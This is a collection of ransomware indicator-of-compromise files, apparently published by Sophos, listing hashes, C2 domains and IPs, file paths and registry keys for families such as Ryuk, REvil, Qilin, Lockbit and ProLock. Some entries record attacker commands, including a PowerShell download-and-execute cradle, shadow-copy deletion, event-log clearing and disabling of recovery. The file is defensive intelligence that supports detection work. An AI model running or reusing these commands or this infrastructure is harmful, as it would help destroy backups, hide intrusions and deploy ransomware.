updater  33 | service,"%COMSPEC% /C ""whoami""",Named with random 16-digit string 34 | service,"%COMSPEC% /C echo wmic logicaldisk get description,name ^> %SYSTEMDRIVE%\WINDOWS\Temp\CIrmjHmIzofVNjPd.txt > \WINDOWS\Temp\KmsVUcNomePVWphR.bat & %COMSPEC% /C start %COMSPEC% /C \WINDOWS\Temp\KmsVUcNomePVWphR.bat",Named with random 16-digit string 35 | service,%COMSPEC% /C echo whoami ^> ZSYSTEMDRIVE%\WINDOWS\Temp\pkLneFsUyHywlUwZ.txt > \WINDOWS\Temp\sloKuaTCIYlTTPwM.bat & %COMSPEC% /C start %COMSPEC% /C \WINDOWS\Temp\sloKuaTCIYlTTPwM.bat,Named with random 16-digit string 36 | sha256,30ff38e859a849b6776dd7b0f299ba83605858f661297f39585bcf928769feef,Cobalt Strike 37 | sha256,5606c92af263869268a11eb730eb32d5fd770896530b23e42d2390d6ef230d61,Mount Locker ransomware DLL 38 | sha256,864930113d66c413bab705e79add3659efa95126449bfad05abf99c6d7e8ae00,Cobalt Strike 39 | -------------------------------------------------------------------------------- /Ransomware-Netfilim.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | sha256,e7ccbcc9f500272f8b6422e9900c5131768cc9ca074e6cb8cc92bce385a7ee2e,Netfilim (Nemty) ransomware 3 | sha256,3cd9b8f675d4718c4d73a9b1656836790a058b8ba46c1e0f254d46775ab06556,Cobalt Strike 4 | command_line_parameter,-nop -w hidden -c IEX ((new-object net.webclient).downloadstring,Powershell command 5 | domain,aes.one,C2 6 | file_path_name,%AppData%/Local/MEGAsync.exe,MEGA app to exfiltrate data 7 | file_path_name,%AppData%/Local/MEGAupdater.exe,MEGA app to exfiltrate data 8 | ip,45.11.180.250,Threat Actor Infrastructure 9 | filename,INFECTION-HELP.txt,Ransom Note 10 | -------------------------------------------------------------------------------- /Ransomware-Netwalker: -------------------------------------------------------------------------------- 1 | ##IOCs 2 | 3 | #Netwalker ransomware 4 | 0081ebb0d55eda81281afc952107b1540dc3b8ee 5 | 0e76db2d2a61b5983c295bb325049b64e74b40ba 6 | 
147c1adc615daa93e84a5a9210ccc14ae86f6c55 7 | 16094d75f4bb593b196210e5d082a7abcdce1d8c 8 | 183bca7e9b101a5e29ce6698e365ee552b48d0d8 9 | 1897bcfc7f3d4a36bdd29da61e87ba00812dca24 10 | 19f12d29639ced3d22f8b4e8e07bf83e1a3fc0aa 11 | 1b5dc84b6fc69ffcc7d8bbf3e3ab0b9b305d6365 12 | 1e1b1c4ae648786fe429c9ddd2182e0d58bcf423 13 | 2a12c2297e08649933785629b047edc38ebe907c 14 | 2ddf48174221371ad4f5d339353a3f998044d95d 15 | 31e27c53077208aff54b883e8304b06440f736e2 16 | 3262e3d171b3b371a59ef62053032ff4d8510657 17 | 3fb77d821ea7ec2b30fd3944c3d9361093a58cd6 18 | 412112597d6c0dd099def148527a2b0466f0f658 19 | 4418547ab686293b57252ee9217d3e0e6823e3b3 20 | 4d02ab30002814f3ce0a9888a34abcf641fad3d1 21 | 4d3500625181c1469f66163bb7882ec1e82ce46a 22 | 4ff76d95673f950b4f949d9f362ee0cafa6307e2 23 | 50de46dcd782cafbdecec9860695ca3366644a3d 24 | 5b165601b8d0b13a8833c31cb36644aea8121f74 25 | 5be2fb7adcfefd741e6b98b4beeadf9e24ea7423 26 | 5c3aede31aaa0c77bfc56111ec39ac0503662dd7 27 | 61905f80bd29b2bd0cd522a7e822aeb8733bb78c 28 | 69e858f578fb0e7fdfb1d26db52dd6a95f5802ff 29 | 6a13535190bdcd62af6b4930ea28664c13c6a6be 30 | 6c06ed6155aef39529286ab8878432b74ac305b8 31 | 6da8ae1da95a0c96b432ad822076a0255e6744fd 32 | 6deb034d270782df82b9a012b1e69df6cccb21fe 33 | 794589026bdc8b01cad097ffcd50be37a87e7c29 34 | 79e6d0dbdfb89350fcf924c6554a5b7c79d4d66d 35 | 807d30f37bf2e052a253f64d102a7ab21933567b 36 | 82720e4d3fb83baff552ec25eea0fed2befe94fa 37 | 8bbfdfdfd026a106943c4e2ec317c89285aa98da 38 | 9185d661347a9637250e118d4ee91188945cd699 39 | 96432d979fdec055e4f40845a27cf4a9c0a0a34b 40 | 9df8e910986e2d6868278bd63236aa929630da40 41 | a14bab81de06e9b590f6cfcd400f90fb5b667eff 42 | a5bea314f701b06efd71533c6db8760da3509cc3 43 | ae9a1f6df72e286c5be1ab13bbd8c75878625d58 44 | b00710d529aefd25d8d51a2c0577bbb72191bc05 45 | b0589d8d73590f39b6f9eba50c375fab858ccfb5 46 | b1212f5b90c45cd22e2601edf74a68e617baa86d 47 | c26d5fbe02f8b0e6a40672b12e69ee78343e9a41 48 | c400de9be89e17b57532ec003e404941f95e358b 49 | 
c5b3fa421db00fe931f439af5df4f65f7f3d9a1a 50 | d051839026937273723e1b8523d852e799e72041 51 | e1dc994b0ac412e9be56f615eaf4c3dd73315253 52 | d35cbad4163a967f66be460bac029895506917ed 53 | e57731be1f15c323a7b55b914a0599722ff3985f 54 | f0952ec5d3c90398e1335f1fad00b80dbd4c5a32 55 | 56 | #Reconnaissance tools 57 | 5aa43391fa00828b0d764b555eb1908b747c8781 58 | 59 | ##Privilege elevation exploits 60 | 61 | #CVE-2020-0796 62 | 656611001c4a0dcba77392b61461395c9abe82a5 63 | 97ee255315173ff6cc62ef4ede12d4cec64af008 64 | 65 | #CVE-2019-1458 66 | c82fe9c9fdd61e1e677fe4c497be2e7908476d64 67 | 68 | #CVE-2017-0213 69 | b3423b5d096cf915019cd8d7c994cf9919523901 70 | 71 | #CVE-2015-1701 72 | 90d17ebd75ce7ff4f15b2df951572653efe2ea17 73 | 74 | ##Password grabbers 75 | 76 | #Mimikatz-related 77 | 11b0b620d0f0c4269a191d4ad9fd2042fb5e9d6c 78 | 99d6cc258737964336fb3847a7027718f70005f5 79 | bdacb11aeded5bc985a2378174fdbbb3290931be 80 | 81 | #Other 82 | 0ae1f9071c5e8fe4a69d3f671937935d242d8a6c 83 | 662bde0b00757c6cacd795b90115c802f1125692 84 | 93a2d7c3a9b83371d96a575c15fe6fce6f9d50d3 85 | 86 | #Brute forcers 87 | 6d390038003c298c7ab8f2cbe35a50b07e096554 88 | 89 | ##Other tools 90 | 91 | #Teamviewer 92 | 1004077765c94796c4ec515a5c031f32fac80f1b 93 | a89e825ab5013743fbb455a2d0b1f4eb88b5f868 94 | 95 | #AnyDesk 96 | 39194c57c0488eca2ca7600d03783f6df4957688 97 | 98 | #AV removal tools 99 | 1b394aaf9af9338d6335cbfcac88155c6db2ea0b 100 | 0c15d2bd27aa88b03e3d4af7a87f92065a2cc13a 101 | 2bee8579ef9d3146708179ffd881610366e53d15 102 | 103 | #Python installer 104 | 068bca4ae5678a9f8db721066ee029d4dd4bf3f4 105 | 106 | #Lateral movement 107 | 3e32b19e22dd82aab0259752d670e64c9a4a3ae9 108 | 502a5780ae69e87db4842d52c59713b1c79dc702 109 | 110 | #Misc scripts 111 | 3de3b2df19bf8498b94d4b2c2bd2ec21399f346a 112 | 113 | -------------------------------------------------------------------------------- /Ransomware-Play.csv: -------------------------------------------------------------------------------- 1 | 
Indicator,Data,Note 2 | Description,Indicators relating to Play ransomware published to Mastodon,https://infosec.exchange/@SophosXOps/109677906162017090 3 | domain,z3a2.ssndob.cn.com,Domain (Cobalt C2) 4 | domain,mbrlkbtq5jonaqkurjwmxftytyn2ethqvbxfu4rgjbkkknndqwae6byd.onion,Onion site 5 | domain,k7kg3jqxang3wh7hnmaiokchk7qoebupfgoik6rha6mjpzwupwtj25yd.onion,Onion site 6 | filename,22.dll,Cobalt Strike DLL 7 | url,hxxp://45.227.252.247/download/22.dll,file host 8 | ip,107.189.30.131,IPv4 (Cobalt C2) 9 | ip,45.227.252.247,IPv4 (Cobalt C2) 10 | ip,5.255.103.142,IPv4 (SystemBC) 11 | sha256,4346d2098d93a7f6fddd4c37333f8ec17ff548c97f365b831abbb63dd426ed4b,libvlc.dll 12 | sha256,bf0b708978a2495aeb2bb9dd74d990363a34c317f731073a925ed8e1d0c686c0,22.dll 13 | -------------------------------------------------------------------------------- /Ransomware-ProLock.csv: -------------------------------------------------------------------------------- 1 | Indicator_Type,Data,Note 2 | Description,Indicators from ProLock ransomware, 3 | file_path_name,C:\ProgramData\WinMgr.bmp,Image file containing ProLock executable code 4 | file_path_name,C:\ProgramDaa\WinMgr.xml,XML file used for creation of ProLock ransomware task in Windows Task Scheduler 5 | file_path_name,C:\ProgramData\run.bat,Batch file used to create ProLock ransomware task 6 | file_path_name,C:\ProgramData\clean.bat,Batch file containing base64-encoded Powershell script that invokes ProLock executable 7 | file_path_name,C:\Windows\System32\Tasks\WinMgr,Task created to execute ProLock 8 | file_name,[HOW TO RECOVER FILES].txt,ProLock ransom note file 9 | url_path,http://185.212.128.8/B/,Download point for clean.bat 10 | IP address,185.212.128.8,ProLock C&C host 11 | sha_1,9cae5fcefc8bc9b748b4b16549e789e27ae816df,clean.bat ProLock Powershell dropper sample 1 12 | sha_1,a037439ad7e79dbf4a20664cf10126c93429e350,run.bat ProLock launcher script 13 | sha_256,18661f8c245d26be1ec4df48a9e186569a77237f424f322f00ef94652b9d5f35,Run.bat 
ProLock launcher script 14 | sha_1,0ce3614560e7c1ddbc3b8f56f3e45278de47d3bb,clean.bat ProLock Powershell dropper sample 2 15 | sha_256,b262b1b82e5db337d367ea1d4119cadb928963896f1aff940be763a00d45f305,clean.bat ProLock Powershell dropper sample 2 16 | sha_1,4f125d890a8f98c9c7069b0bb2b5625c7754fad6,WinMgr.xml ProLock task scheduler configuration file 17 | sha_256,2f0e4b178311a260601e054b0b405999715084227e49ff18a19e1a59f7b2f309,WinMgr.xml ProLock task scheduler configuration file 18 | sha_1,e2a961c9a78d4c8bf118a0387dc15c564efc8fe9,WinMgr.bmp file carrying ProLock executable (sample 1 and 2 identical) 19 | sha_256,a6ded68af5a6e5cc8c1adee029347ec72da3b10a439d98f79f4b15801abd7af0,WinMgr.bmp file carrying ProLock executable (sample 1 and 2 identical) 20 | sha_256,dfbd62a3d1b239601e17a5533e5cef53036647901f3fb72be76d92063e279178,ProLock executable sample 3 (memory extracted) 21 | sha_1,81d5888bb8d43d88315c040be1f51db6bb5cf64c,ProLock executable sample 3 (memory extracted) 22 | registry_path_key,HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet,Prolock sets to 0 (off) 23 | registry_path_key,HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect,Prolock sets to 1 (on) 24 | registry_path_key,HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1738D1D9-01DA-41FC-B106-6F4DF75D08C9}\Path,"sets values Type: REG_SZ, Length: 16, Data: \WinMgr" 25 | registry_path_key,HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1738D1D9-01DA-41FC-B106-6F4DF75D08C9}\Hash,"sets values Type: REG_BINARY, Length: 32, Data: 56 4F 39 36 66 75 E5 89 94 FF 87 0F 38 FC 15 FB" 26 | registry_path_key,HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\WinMgr\Id,"sets values Type: REG_SZ, Length: 78, Data: {1738D1D9-01DA-41FC-B106-6F4DF75D08C9}" 27 | registry_path_key,HKLM\SOFTWARE\Microsoft\Windows 
NT\CurrentVersion\Schedule\TaskCache\Tree\WinMgr\Index,"Sets values Type: REG_DWORD, Length: 4, Data: 1" 28 | -------------------------------------------------------------------------------- /Ransomware-Qilin-STAC4365.csv: -------------------------------------------------------------------------------- 1 | Indicator,Data,Notes 2 | file_path_name,C:\Users\\Documents\.exe,Qilin ransomware binary executed with a unique 32-character password for each victim 3 | sha256,fdf6b0560385a6445bd399eba03c8662be9e61928d6cbc268d550163a5a09285,Qilin ransomware binary executed with a unique 32-character password for each victim 4 | sha256,0b9b0715a1ffb427a02e61ae8fd11c00b5d086eb76102d4b12634e57285c1aba,Qilin ransomware binary executed with a unique 32-character password for each victim 5 | sha256,9da70c521b929725774c3980763a4aed9baf9de4e6f83fc8f668c3a365a55f82,Qilin ransomware binary executed with a unique 32-character password for each victim 6 | sha256,b52917b0658cd2a9197e6bb62bade243ee1ad164f2bb566f3a1e09dfa580397f,Qilin ransomware binary executed with a unique 32-character password for each victim 7 | sha256,ef3e42e5fa24acaee2428ff0118feb2be925bfe6b1ea4eccce8b70a7ac5ab2cc,Qilin ransomware binary executed with a unique 32-character password for each victim 8 | url,hxxps[:]//b8dymnk3.r.us-east-1.awstrack[.]me/L0/https[:]%2F%2Fcloud.screenconnect[.]com.ms%2FsuKcHZYV/1/010001948f5ca748-c4d2fc4f-aa9e-40d4-afe9-bbe0036bc608-000000/mWU0NBS5qVoIVdXUd4HdKWrsBSI=410,Malicious phishing link redirect with Amazon SES tracking 9 | url,hxxps[:]//cloud.screenconnect[.]com.ms/suKcHZYV/1/010001948f5ca748-c4d2fc4f-aa9e-40d4-afe9-bbe0036bc608-000000/mWU0NBS5qVoIVdXUd4HdKWrsBSI=410,Malicious URI redirect 10 | file_path_name,C:\Windows\SystemTemp\ScreenConnect\24.3.7.9067\ru.msi,Malicious ScreenConnect Client installer file 11 | domain,cloud.screenconnect.com.ms,Malicious URI redirect 12 | ip,186.2.163.10,Malicious web hosting IP 13 | ip,92.119.159.30,Russian IP used to connect to malicious 
ScreenConnect instance 14 | ip,109.107.173.60,Command and Control host 15 | file_path_name,C:\README-RECOVER-  .txt,Ransom note 16 | ip,128.127.180.156,Tor exit node used to connect to ScreenConnect instance 17 | ip,109.70.100.1,Tor exit node used to connect to ScreenConnect instance 18 | sha256,45c8716c69f56e26c98369e626e0b47d7ea5e15d3fb3d97f0d5b6e8997299d1a,Binary used to exploit CVE-2023-27532 in Veeam software. Attacker executed this binary targeting various hosts as an argument over port 9401 19 | file_path_name,C:\programdata\veeam.exe,Binary used to exploit CVE-2023-27532 in Veeam software. Attacker executed this binary targeting various hosts as an argument over port 9401 -------------------------------------------------------------------------------- /Ransomware-REvil-Kaseya.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | file_path_name,C:\windows\cert.exe,Copied CERTUTIL 3 | file_path_name,C:\windows\msmpeng.exe,Outdated Defender executable vulnerable to DLL sideload 4 | sha256,33bc14d231a4afaa18f06513766d5f69d8b88f1e697cd127d24fb4b72ad44c7a,Outdated Defender executable vulnerable to DLL sideload 5 | file_path_name,C:\kworking\agent.crt,Revil dropper used in Kaseya exploit 6 | sha256,d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1,Revil dropper used in Kaseya exploit 7 | file_path_name,C:\windows\mpsvc.dll,Revil ransomware DLL 8 | sha256,8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd,Revil ransomware DLL 9 | domain,ncuccr.org, 10 | domain,1team.es, 11 | domain,4net.guru, 12 | domain,35-40konkatsu.net, 13 | domain,123vrachi.ru, 14 | domain,4youbeautysalon.com, 15 | domain,12starhd.online, 16 | domain,101gowrie.com, 17 | domain,8449nohate.org, 18 | domain,1kbk.com.ua, 19 | domain,365questions.org, 20 | domain,321play.com.hk, 21 | domain,candyhouseusa.com, 22 | domain,andersongilmour.co.uk, 23 | domain,facettenreich27.de, 24 | domain,blgr.be, 25 | 
domain,fannmedias.com, 26 | domain,southeasternacademyofprosthodontics.org, 27 | domain,filmstreamingvfcomplet.be, 28 | domain,smartypractice.com, 29 | domain,tanzschule-kieber.de, 30 | domain,iqbalscientific.com, 31 | domain,pasvenska.se, 32 | domain,cursosgratuitosnainternet.com, 33 | domain,bierensgebakkramen.nl, 34 | domain,c2e-poitiers.com, 35 | domain,gonzalezfornes.es, 36 | domain,tonelektro.nl, 37 | domain,milestoneshows.com, 38 | domain,blossombeyond50.com, 39 | domain,thomasvicino.com, 40 | domain,kaotikkustomz.com, 41 | domain,mindpackstudios.com, 42 | domain,faroairporttransfers.net, 43 | domain,daklesa.de, 44 | domain,bxdf.info, 45 | domain,simoneblum.de, 46 | domain,gmto.fr, 47 | domain,cerebralforce.net, 48 | domain,myhostcloud.com, 49 | domain,fotoscondron.com, 50 | domain,sw1m.ru, 51 | domain,homng.net, -------------------------------------------------------------------------------- /Ransomware-Ryuk.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,IoCs of a Ryuk ransomware attack,https://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/ 3 | domain,chainnss.com,C2 used for reverse shell 4 | domain,fastbloodhunter.com,C2 used for reverse shell 5 | domain,mn.fastbloodhunter.com,C2 Cobalt Strike 6 | domain,mn.fastbloodhunter.com/templates,C2 Cobalt Strike 7 | file_path,C:\PerfLogs\*.exe,any executable files in the Performance Logs folder 8 | file_path,C:\ProgramData\c331b9e8724cb2dd8a2f\,Troj/Cobalt-J - multiple Cobalt Strike components found here 9 | file_path,c:\programdata\sqav\,File path used by Trickbot 10 | file_path,C:\share$\,File path used by Troj/Ryuk-AP 11 | file_path_name,c:\perflogs\Arti64.dll,Troj/Agent-BFQ 12 | file_path_name,C:\PerfLogs\cc1.exe,Troj/Ryuk-AR 13 | file_path_name,C:\PerfLogs\fx11_only_current_pc_for_crypt_x86.exe,Troj/Ryuk-AQ 14 | file_path_name,c:\perflogs\m8.exe,Troj/Ryuk-AP 15 | 
file_path_name,C:\PerfLogs\mm1.exe,Troj/Ryuk-AR 16 | file_path_name,C:\PerfLogs\RyukReadMe.html,Ryuk ransom note 17 | file_path_name,C:\PerfLogs\xXx.exe,Troj/Ryuk-AP 18 | file_path_name,C:\PerfLogs\zZz.exe, 19 | file_path_name,c:\programdata\sqav\itvs.exe,Troj/Trickbo-ZA 20 | file_path_name,C:\share$\xxx.exe,Troj/Ryuk-AP 21 | file_path_name,C:\temp\nr6r.exe,Consider any executable files in the temp folder suspicious 22 | file_path_name,c:\users\[username]\appdata\local\microsoft\windows\inetcache\ie\tp7uyqhh\print_document.exe,Troj/Agent-BFQS (Emotet) - Consider any executable files running from within the browser cache folder suspicious 23 | file_path_name,C:\Users\ntadmin\Pictures\svhost32.exe,Troj/Cobalt-J - Consider any executable files in the Pictures folder suspicious 24 | file_path_name,C:\Windows\Temp\adf\adf.bat, 25 | file_path_name,C:\Windows\Temp\MRT\socks.exe,Troj/Trickbo-ZA - Consider any executable files in the temp folder suspicious 26 | file_path_name,c:\windows\temp\mrt\socks32.dll,Consider any DLL files loaded from the temp folder suspicious 27 | file_path_name,C:\Windows\Temp\Puhebes.exe,Mal/Inject-GQ - Consider any executable files in the temp folder suspicious 28 | filename,3iue88e0.exe,GMER - known file hash 29 | filename,P64.exe,Troj/Cobalt-J 30 | ip,104.248.83.13,C2 Cobalt Strike 31 | sha256,0856b3c06805d3935b1db325c4e9c9131572b4cf09f07d989911495807775cab,Troj/Cobalt-J 32 | sha256,0d6a7a2c2d9ae89bf54f199fb63c67424d6e242777060971ee53b62dedad4096,dropper 33 | sha256,21cb81424dc1921344bd1cd9ad7c870fbcaadbe2e9f499d7863e9a06d7de6ee0,Troj/Ryuk-AR 34 | sha256,32e51accf5a30da12e43b3c7f83867577fcd6fb363d7773a743ab1bbb9653d06,Troj/Trickbo-ZA 35 | sha256,3f58610586c87bb8b9f2e93768c5f289fe39ca8570902165df5d340bedc62247,Mal/Inject-GQ 36 | sha256,3f58610586c87bb8b9f2e93768c5f289fe39ca8570902165df5d340bedc62247,Mal/Inject-GQ 37 | sha256,4685e91b859b372b955c11d8d68fd562fad478520a2f4a05c46d1fe6fb991b61,Troj/Cobalt-J 38 | 
sha256,6c7f43434e5db8703c0a47dedeeab976159d8704bfbe2e4ff65405f38d508e9d,Troj/Agent-BFQS (Emotet) 39 | sha256,92f124ea5217f3fe5cbab1c37a961df0437d5a9cbde1af268c60c4b3194b80ed,Troj/Ryuk-AR 40 | sha256,9a11e1b2a6821857e1990a004447e35692d04e5b7d237697fbcc90b5198e3719,Troj/Cobalt-J 41 | sha256,ba2a96dae66324df5bbb0751a04c538722ad49daa12d51625f8a1890608b1168,Troj/Cobalt-J 42 | sha256,c1f753047a0a5679aea0f675846364ea2f1fc4f9370f6caa89d0bfb1feb561f1,dropper 43 | sha256,c8076d0aa251a8c767e5f4c32c29588d46ffbed1709acaf9ca38b9d02ef7e276,Troj/Agent-BFQ 44 | sha256,c9b06152ac1c851eaed84ee052c374341ed89d9a6e5a5d97bd0e4b941c01a274,Troj/Cobalt-J 45 | sha256,d0d7a8f588693b7cc967fb4069419125625eb7454ba553c0416f35fc95307cbe,Troj/Ryuk-AP 46 | sha256,D7333223DCC1002AAE04E25E31D8C297EFA791A2C1E609D67AC6D9AF338EFBE8,Troj/Ryuk-AQ 47 | sha256,e8a3e804a96c716a3e9b69195db6ffb0d33e2433af871e4d4e1eab3097237173,GMER - misused potentially beneficial app 48 | sha256,edd0675e0fcce16ae7cbb1f10fbb8407ca5e0a188eab9682f43744c95e09f1c9, 49 | sha256,ff5e6fbf14c5eb35c1b4f24e4b08b30ba2e512a4b25ab7b652f0567edb94097e,Troj/Cobalt-J 50 | -------------------------------------------------------------------------------- /Ransomware_BlackCat - triple ransomware attack.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,"IOCs related to triple ransomware attacks by Lockbit, Hive, and ALPHV/BlackCat",https://news.sophos.com/en-us/lockbit-hive-and-blackcat-attack-automotive-supplier-in-triple-ransomware-attack 3 | filename,FXXX.exe,ALPHV/BlackCat ransomware executable 4 | file_path,C:\users\[user]\desktop\fXXX.exe ,Filepath of ALPHV/BlackCat ransomware executable 5 | filename,FXXXX.exe,ALPHV/BlackCat ransomware executable 6 | file_path,C:\fXXXX.exe,Filepath of ALPHV/BlackCat ransomware executable 7 | sha256,a50ddd96edf7f66a29b407657e8548e2b026bf1ac3d4e08e396f4043d4513f9e ,Hash of ALPHV/BlackCat ransomware executable 8 | 
sha256,9078564b65b9ac3ce4f59c929207f17037ef971429f0d3ef3751d46651fec8c6 ,Hash of ALPHV/BlackCat ransomware executable 9 | filename,RECOVER-eprzzxl-FILES.txt,ALPHV/BlackCat ransom note 10 | filename,sh.txt,Contains results of threat actor remote share enumeration 11 | command_line,bcdedit /set {default} recoveryenabled No ,Disable recovery 12 | command_line,"cmd.exe /c for /F \""tokens=*\"" %1 in ('wevtutil.exe el') DO wevtutil.exe cl \""%1\"" ",Clear Windows Event Logs 13 | command_line,vssadmin.exe Delete Shadows /all /quiet ,Delete volume shadow copies 14 | command_line,wmic.exe Shadowcopy Delete ,Delete volume shadow copies 15 | -------------------------------------------------------------------------------- /Ransomware_BlackKingDom.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,Files from the Black KingDom ransomware report,https://news.sophos.com/en-us/2021/03/23/black-kingdom/ ? 3 | file_path_name,c:\Windows\System32\(16 random alphabet characters).exe,webshell drops ransomware to the %SYSTEM% 4 | url,hxxp://yuuuuu44[.]com/vpn-service/$(f1)/crunchyroll-vpn,Where $(f1) is a randomly-generated 16-alphabetic character string 5 | domain,yuuuuu44.com,Domain used to host malware payloads 6 | ip,104.21.89.10,IP address used to host the yuuuuu44 domain 7 | ip,172.64.80.0/20,IP address range used to host the yuuuuu44 domain 8 | ip,185.220.101.204,Tor exit node - malware delivery 9 | ip,185.220.101.216,Tor exit node - malware orchestration 10 | sha256,b9dbdf11da3630f464b8daace88e11c374a642e5082850e9f10a1b09d69ff04f,Ransomware executable 11 | sha256,c4aa94c73a50b2deca0401f97e4202337e522be3df629b3ef91e706488b64908,Ransomware executable 12 | sha256,a387c3c5776ee1b61018eeb3408fa7fa7490915146078d65b95621315e8b4287,Ransomware executable 13 | sha256,815d7f9d732c4d1a70cec05433b8d4de75cba1ca9caabbbe4b8cde3f176cc670,Ransomware executable 14 | 
sha256,910fbfa8ef4ad7183c1b5bdd3c9fd1380e617ca0042b428873c48f71ddc857db,Ransomware executable 15 | sha256,866b1f5c5edd9f01c5ba84d02e94ae7c1f9b2196af380eed1917e8fc21acbbdc,Ransomware executable 16 | sha256,c25a5c14269c990c94a4a20443c4eb266318200e4d7927c163e0eaec4ede780a,Ransomware executable 17 | sha256,62615438CF8F7DE6600D16A493C28BBBD3B052CCC4F9414DFE1CF031681E226F,ChackPassPL.aspx webshell - not publicly released 18 | sha256,800E036CF9DA316193BECABC6ACE688634709CD898AE81893E80B635DCAA06D0,ChackIdIO.aspx webshell - not publicly released 19 | -------------------------------------------------------------------------------- /Ransomware_DearCry.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | sha256,2B9838DA7EDB0DECD32B086E47A31E8F5733B5981AD8247A2F9508E232589BFF,DearCry 3 | sha256,FEB3E6D30BA573BA23F3BD1291CA173B7879706D1FE039C34D53A4FDCDF33EDE,DearCry 4 | sha256,E044D9F2D0F1260C3F4A543A1E67F33FCAC265BE114A1B135FD575B860D2B8C6,DearCry 5 | sha256,10BCE0FF6597F347C3CCA8363B7C81A8BFF52D2FF81245CD1E66A6E11AEB25DA,DearCry 6 | sha256,FDEC933CA1DD1387D970EEEA32CE5D1F87940DFB6A403AB5FC149813726CBD65,DearCry 7 | -------------------------------------------------------------------------------- /Ransomware_Hive - triple ransomware attack.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,"IOCs related to triple ransomware attacks by Lockbit, Hive, and ALPHV/BlackCat",https://news.sophos.com/en-us/lockbit-hive-and-blackcat-attack-automotive-supplier-in-triple-ransomware-attack 3 | filename,windows_x32_encrypt.exe,Hive ransomware executable 4 | file_path,C:\Windows\AdminArsenal\PDQDeployRunner\service-1\exec\windows_x32_encrypt.exe,Filepath of Hive ransomware executable 5 | filename,HOW_TO_DECRYPT.txt,Hive ransom note 6 | sha256,4b8e83f4f6257fc1b9fa485030c4f195313bf3b1f41d279bbc728abc6bb9309a ,Hash of Hive ransomware executable 7 | 
command_line,windows_x32_encrypt.exe -u [] -da [DOMAIN]\[user]:[password], 8 | -------------------------------------------------------------------------------- /Ransomware_Lockbit - triple ransomware attack.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,"IOCs related to triple ransomware attacks by Lockbit, Hive, and ALPHV/BlackCat",https://news.sophos.com/en-us/lockbit-hive-and-blackcat-attack-automotive-supplier-in-triple-ransomware-attack 3 | sha256,24a087ac1d44356a49e67dbfdc8bd1a393a524282f2b4df2daa76e3a38638f2f ,Hash of Lockbit ransomware executable locker.exe 4 | sha256,a385b92ce5ffa4171c94997f158ec5c02181da77ec0bc5f9457c98fb9d38158b,Hash of Lockbit ransomware executable LockBit_AF51C0A7004B80EA.exe  5 | filename,LockBit_AF51C0A7004B80EA.exe ,Lockbit ransomware executable 6 | filename,locker.exe,Lockbit ransomware executable 7 | file_path,C:\Users\[user]\Desktop\LockBit_AF51C0A7004B80EA.exe,Filepath of Lockbit ransomware executable 8 | file_path,C:\new folder\locker.exe ,Filepath of Lockbit ransomware executable 9 | filename,Restore-My-Files.txt,Lockbit ransom note 10 | filename,invoke-mimikatz.ps1,Mimikatz PowerShell script 11 | file_path,C:\users\[user]\desktop\invoke-mimikatz.ps1 ,Filepath of Mimikatz PowerShell script 12 | filename,1.bat,Batch script to deploy ransomware 13 | filename,2.bat,Batch script to deploy ransomware 14 | -------------------------------------------------------------------------------- /Ransomware_prolock_processes_stopped.csv: -------------------------------------------------------------------------------- 1 | Process name,Application 2 | agentsvc.exe,A component of Panda Security's antivirus 3 | dbgeng50.exe,A component of IBM's Rational Rose software modeling tool 4 | dbsnmp.exe,Oracle intelligent agent executable 5 | excel,Microsoft Excel 6 | firefox,Mozilla Firefox browser 7 | infopath,Microsoft InfoPath 8 | isql ,Interactive SQL parser utility 
distributed with Sybase 9 | mbamtray,A component of Malwarebytes antivirus 10 | msaccess,Microsoft Access database 11 | mspub,Microsoft Publisher 12 | mydesktop,Virtual desktop interface 13 | mysql,mySQL database 14 | ntrtscan ,Trend Micro antivirus 15 | ocssd ,Oracle Cluster Synchronization Services daemon 16 | onenote,Microsoft OneNote 17 | oracle,Oracle database 18 | outlook,Microsoft Outlook 19 | pccntmon,Trend Micro antivirus 20 | powerpoint,Microsoft PowerPoint 21 | sqbcoreservice ,Redgate SQL Backup agent 22 | thunderbird,Mozilla Thunderbird mail client 23 | visio,Microsoft Visio 24 | winword,Microsoft Word -------------------------------------------------------------------------------- /STAC1807_June_update.csv: -------------------------------------------------------------------------------- 1 | Indicator,Data ,Notes 2 | ip,188.166.243.83, 3 | ip,68.183.224.50, 4 | ip,128.199.144.251, 5 | file_path_name,C:\programdata\adobe\mscorsvw.exe, 6 | file_path_name,C:\Windows\system32\mscorsvw.exe, 7 | file_path_name,C:\Windows\Setup\mscorsvw.exe, 8 | file_path_name,C:\hclabap\barcode\mscorsvw.exe, 9 | file_path_name,C:\HCLABSmart\barcode\mscorsvw.exe, 10 | file_path_name,C:\Windows\System32\migration\WUDFUsbccidDriver.exe, 11 | file_path_name,C:\programdata\microsoft\EdgeUpdate\ASDTool.exe, 12 | file_path_name,C:\programdata\adobe\mscorsvc.dll, 13 | file_path_name,C:\Windows\system32\mscorsvc.dll, 14 | file_path_name,C:\Windows\Setup\mscorsvc.dll, 15 | file_path_name,C:\hclabap\barcode\mscorsvc.dll, 16 | file_path_name,C:\HCLABSmart\barcode\msi.dll, 17 | file_path_name,C:\Windows\System32\migration\msi.dll, 18 | file_path_name,C:\programdata\microsoft\EdgeUpdate\msi.dll,https://www.virustotal.com/gui/file/8781f2d85eec49205b29aa4bc09b1d7d1dd9e1a650634393e3adbc5354738a51 19 | 